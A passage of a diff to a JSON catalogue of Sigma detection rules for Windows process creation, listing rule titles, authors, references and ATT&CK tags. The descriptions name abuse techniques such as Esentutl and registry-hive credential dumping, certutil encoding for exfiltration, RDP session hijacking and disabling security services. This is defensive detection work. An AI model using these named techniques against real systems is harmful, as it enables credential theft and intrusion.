imphash and executable product string", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/09", + "author": "Jason Lynch", + "creation_date": "2019/04/17", "falsepositive": [ - "Legitmate usage of the utility by administrators to query the event log" + "Unknown imphashes" ], - "filename": "proc_creation_win_wevtutil_recon.yml", + "filename": "proc_creation_win_renamed_paexec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml" + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_paexec.yml" ], "tags": [ - "attack.discovery" + "attack.defense_evasion", + "attack.t1036.003", + "attack.g0046", + "car.2013-05-009", + "attack.execution", + "attack.t1569.002" ] }, - "uuid": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", - "value": "Wevtutil Recon" + "uuid": "7b0666ad-3e38-4e3d-9bab-78b06de85f7b", + "value": "Execution of Renamed PaExec" }, { - "description": "Detects a whoami.exe executed by privileged accounts that are often misused by threat actors", + "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", + "meta": { + "author": "sam0x90", + "creation_date": "2021/08/06", + "falsepositive": [ + "To be determined" + ], + "filename": "proc_creation_win_susp_esentutl_params.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/software/S0404/", + "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", + "https://twitter.com/vxunderground/status/1423336151860002816", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_esentutl_params.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1003.003" + ] + }, + "uuid": "7df1713a-1a5b-4a4b-a071-dc83b144a101", + "value": "Esentutl Gather Credentials" + }, + { + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", "meta": { "author": "Florian Roth", - "creation_date": "2022/01/28", + "creation_date": "2020/01/28", "falsepositive": [ - "Unknown" + "Unknown yet" ], - "filename": "proc_creation_win_whoami_as_priv_user.yml", + "filename": "proc_creation_win_susp_renamed_dctask64.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://nsudo.m2team.org/en-us/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml" + "https://twitter.com/gN3mes1s/status/1222095963789111296", + "https://twitter.com/gN3mes1s/status/1222088214581825540", + "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml" ], "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.defense_evasion", + "attack.t1036", + "attack.t1055.001", + "attack.t1202", + "attack.t1218" ] }, - "uuid": "79ce34ca-af29-4d0e-b832-fc1b377020db", - "value": "Run Whoami as Privileged User" + "uuid": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "value": "Renamed ZOHO Dctask64" }, { - "description": "Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.", + "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", "meta": { - "author": "Teymur Kheirkhabarov, Florian Roth", - "creation_date": "2019/10/23", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/02", "falsepositive": [ - "Possible name overlap with NT AUHTORITY substring to cover all languages" + "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." ], - "filename": "proc_creation_win_whoami_as_system.yml", + "filename": "proc_creation_win_lolbin_remote.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "4eddc365-79b4-43ff-a9d7-99422dc34b93", + "value": "Use of Remote.exe" + }, + { + "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/16", + "falsepositive": [ + "Legitimate use by an administrator" + ], + "filename": "proc_creation_win_lolbin_openconsole.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1537563834478645252", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "814c95cc-8192-4378-a70a-f1aafd877af1", + "value": "Use of OpenConsole" + }, + { + "description": "Detects the execution GMER tool based on image and hash fields.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_gmer_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_system.yml" + "http://www.gmer.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gmer_execution.yml" ], "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.defense_evasion" ] }, - "uuid": "80167ada-7a12-41ed-b8e9-aa47195c66a1", - "value": "Run Whoami as SYSTEM" + "uuid": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", + "value": "GMER - Rootkit Detector and Remover Execution" }, { - "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privieleges. This is often used after a privilege escalation attempt.", + "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", "meta": { "author": "Florian Roth", - "creation_date": "2021/05/05", + "creation_date": "2021/03/05", "falsepositive": [ - "Administrative activity (rare lookups on current privileges)" + "Unknown" ], - "filename": "proc_creation_win_whoami_priv.yml", + "filename": "proc_creation_win_susp_rundll32_inline_vbs.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_priv.yml" + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_inline_vbs.yml" ], "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.defense_evasion", + "attack.t1055" ] }, - "uuid": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", - "value": "Run Whoami Showing Privileges" - }, - { - "description": "Detects Task Scheduler .job import arbitrary DACL write\\par", - "meta": { - "author": "Olaf Hartong", - "creation_date": "2019/05/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_win10_sched_task_0day.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SandboxEscaper/polarbearrepo/tree/master/bearlpe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win10_sched_task_0day.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1053.005", - "car.2013-08-001" - ] - }, - "uuid": "931b6802-d6a6-4267-9ffa-526f57f22aaf", - "value": "Windows 10 Scheduled Task SandboxEscaper 0-day" - }, - { - "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/25", - "falsepositive": [ - "Other legitimate \"Windows Terminal\" profiles" - ], - "filename": "proc_creation_win_windows_terminal_susp_children.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/windowsterminalprofile.html", - "https://twitter.com/nas_bench/status/1550836225652686848", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence" - ] - }, - "uuid": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", - "value": "Suspicious WindowsTerminal Child Processes" - }, - { - "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", - "meta": { - "author": "Georg Lauenstein", - "creation_date": "2022/09/19", - "falsepositive": [ - "Other programs that use the same command line flags" - ], - "filename": "proc_creation_win_winpeas_tool.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/carlospolop/PEASS-ng", - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1082", - "attack.t1087", - "attack.t1046" - ] - }, - "uuid": "98b53e78-ebaf-46f8-be06-421aafd176d9", - "value": "Detect Execution of winPEAS" - }, - { - "description": "Detects the Installation of a Exchange Transport Agent", - "meta": { - "author": "Tobias Michalski", - "creation_date": "2021/06/08", - "falsepositive": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." - ], - "filename": "proc_creation_win_win_exchange_transportagent.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win_exchange_transportagent.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.002" - ] - }, - "uuid": "83809e84-4475-4b69-bc3e-4aad8568612f", - "value": "MSExchange Transport Agent Installation" - }, - { - "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model...etc.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_wmic_computersystem_recon.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml" - ], - "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", - "value": "Suspicious Get ComputerSystem Information with WMIC" - }, - { - "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_wmic_group_recon.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_group_recon.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ] - }, - "uuid": "164eda96-11b2-430b-85ff-6a265c15bf32", - "value": "Suspicious Get Local Groups Information with WMIC" - }, - { - "description": "Detects wmic known recon method to look for installed hotfixes, often used by pentest and attackers enum scripts", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_wmic_hotfix_enum.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", - "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", - "value": "WMIC Hotfix Recon" + "uuid": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", + "value": "Suspicious Rundll32 Invoking Inline VBScript" }, { "description": "An adversary might use WMI to list Processes running on the compromised host or list installed Software hotfix and patches.", @@ -57700,429 +50976,733 @@ ] }, "uuid": "221b251a-357a-49a9-920a-271802777cc0", - "value": "Suspicious WMI Reconnaissance" + "value": "WMI Process Reconnaissance" }, { - "description": "An adversary might use WMI to execute commands on a remote system", + "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", "meta": { "author": "frack113", - "creation_date": "2022/03/13", + "creation_date": "2022/05/07", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_wmic_remote_command.yml", + "filename": "proc_creation_win_lolbin_ilasm.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_command.yml" + "https://www.echotrail.io/insights/search/ilasm.exe", + "https://lolbas-project.github.io/lolbas/Binaries/Ilasm/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "850d55f9-6eeb-4492-ad69-a72338f65ba4", + "value": "Ilasm Lolbin Use Compile C-Sharp" + }, + { + "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_git_clone.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_git_clone.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1593.003" + ] + }, + "uuid": "aef9d1f1-7396-4e92-a927-4567c7a495c1", + "value": "Suspicious Git Clone" + }, + { + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/11/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_target_location_shell32.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.group-ib.com/resources/threat-research/red-curl-2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011" + ] + }, + "uuid": "32b96012-7892-429e-b26c-ac2bf46066ff", + "value": "Shell32 DLL Execution in Suspicious Directory" + }, + { + "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", + "meta": { + "author": "frack113", + "creation_date": "2022/04/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_msiexec_embedding.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml" + ], + "tags": [ + "attack.t1218.007", + "attack.defense_evasion" + ] + }, + "uuid": "4a2a2c3e-209f-4d01-b513-4155a540b469", + "value": "Suspicious MsiExec Embedding Parent" + }, + { + "description": "Detects a suspicious child process of userinit", + "meta": { + "author": "Florian Roth (rule), Samir Bousseaden (idea)", + "creation_date": "2019/06/17", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "proc_creation_win_susp_userinit_child.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1139811587760562176", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "b655a06a-31c0-477a-95c2-3726b83d649d", + "value": "Suspicious Userinit Child Process" + }, + { + "description": "Detects RDP Session Hijacking on Windows systems", + "meta": { + "author": "@juju4", + "creation_date": "2022/12/27", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_rdp_session_hijacking.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Moti_B/status/909449115477659651", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdp_session_hijacking.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "224f140f-3553-4cd1-af78-13d81bf9f7cc", + "value": "Potential RDP Session Hijacking Activity" + }, + { + "description": "Detects suspicious Plink tunnel port forwarding to a local port", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/19", + "falsepositive": [ + "Administrative activity using a remote port forwarding to a local port" + ], + "filename": "proc_creation_win_susp_plink_port_forward.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d", + "https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" + ] + }, + "uuid": "48a61b29-389f-4032-b317-b30de6b95314", + "value": "Suspicious Plink Port Forwarding" + }, + { + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "meta": { + "author": "Florian Roth, John Lambert (idea), elhoim", + "creation_date": "2021/07/14", + "falsepositive": [ + "Unknown", + "Other security solution installers" + ], + "filename": "proc_creation_win_susp_reg_disable_sec_services.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1", + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", + "https://twitter.com/JohnLaTwC/status/1415295021041979392", + "https://vms.drweb.fr/virus/?i=24144899", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "5e95028c-5229-4214-afae-d653d573d0ec", + "value": "Reg Disable Security Service" + }, + { + "description": "Detects suspicious a certutil command that used to encode files, which is sometimes used for data exfiltration", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/02/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_certutil_encode.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", + "value": "Certutil Encode" + }, + { + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_mshtml_runhtmlapplication.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/n1nj4sec/status/1421190238081277959", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshtml_runhtmlapplication.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "value": "Mshtml DLL RunHTMLApplication Abuse" + }, + { + "description": "Detects Too long PowerShell command lines", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_long_powershell_commandline.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_long_powershell_commandline.yml" ], "tags": [ "attack.execution", - "attack.t1047" + "attack.t1059.001" ] }, - "uuid": "e42af9df-d90b-4306-b7fb-05c863847ebd", - "value": "WMI Remote Command Execution" + "uuid": "d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", + "value": "Too Long PowerShell Commandlines" }, { - "description": "An adversary might use WMI to check if a certain Remote Service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", + "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_remote_file_download_desktopimgdownldr.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_file_download_desktopimgdownldr.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "214641c2-c579-4ecb-8427-0cf19df6842e", + "value": "Remote File Download via Desktopimgdownldr Utility" + }, + { + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "meta": { + "author": "Max Altgelt", + "creation_date": "2021/12/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_non_exe_image.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestlaboratories.com/2021/12/08/process-ghosting/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "c09dad97-1c78-4f71-b127-7edb2b8e491a", + "value": "Execution of Suspicious File Type Extension" + }, + { + "description": "Detects Credential Acquisition via Registry Hive Dumping", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/10/04", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_credential_acquisition_registry_hive_dumping.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_acquisition_registry_hive_dumping.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "4d6c9da1-318b-4edf-bcea-b6c93fa98fd0", + "value": "Credential Acquisition via Registry Hive Dumping" + }, + { + "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", + "meta": { + "author": "bohops", + "creation_date": "2022/10/30", + "falsepositive": [ + "False positives depend on custom use of vsls-agent.exe" + ], + "filename": "proc_creation_win_susp_vslsagent_agentextensionpath_load.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/bohops/status/1583916360404729857", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vslsagent_agentextensionpath_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "43103702-5886-11ed-9b6a-0242ac120002", + "value": "Suspicious Vsls-Agent Command With AgentExtensionPath Load" + }, + { + "description": "Detects WMI SquiblyTwo Attack with possible renamed WMI by looking for imphash", + "meta": { + "author": "Markus Neis, Florian Roth", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_bypass_squiblytwo.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mattifestation/status/986280382042595328", + "https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bypass_squiblytwo.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1047", + "attack.t1220", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "8d63dadf-b91b-4187-87b6-34a1114577ea", + "value": "SquiblyTwo Execution" + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_automated_collection.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_automated_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119", + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "value": "Automated Collection Command Prompt" + }, + { + "description": "Detect use of DirLister.exe", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_dirlister.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dirlister.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "b4dc61f5-6cce-468e-a608-b48b469feaa2", + "value": "Launch DirLister Executable" + }, + { + "description": "Use of the commandline to shutdown or reboot windows", "meta": { "author": "frack113", "creation_date": "2022/01/01", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_wmic_remote_service.yml", + "filename": "proc_creation_win_susp_shutdown.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_service.yml" + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shutdown.yml" ], "tags": [ - "attack.execution", - "attack.t1047" + "attack.impact", + "attack.t1529" ] }, - "uuid": "09af397b-c5eb-4811-b2bb-08b3de464ebf", - "value": "WMI Reconnaissance List Remote Services" + "uuid": "34ebb878-1b15-4895-b352-ca2eeb99b274", + "value": "Suspicious Execution of Shutdown" }, { - "description": "Uninstall an application with wmic", - "meta": { - "author": "frac113", - "creation_date": "2022/01/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_wmic_remove_application.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 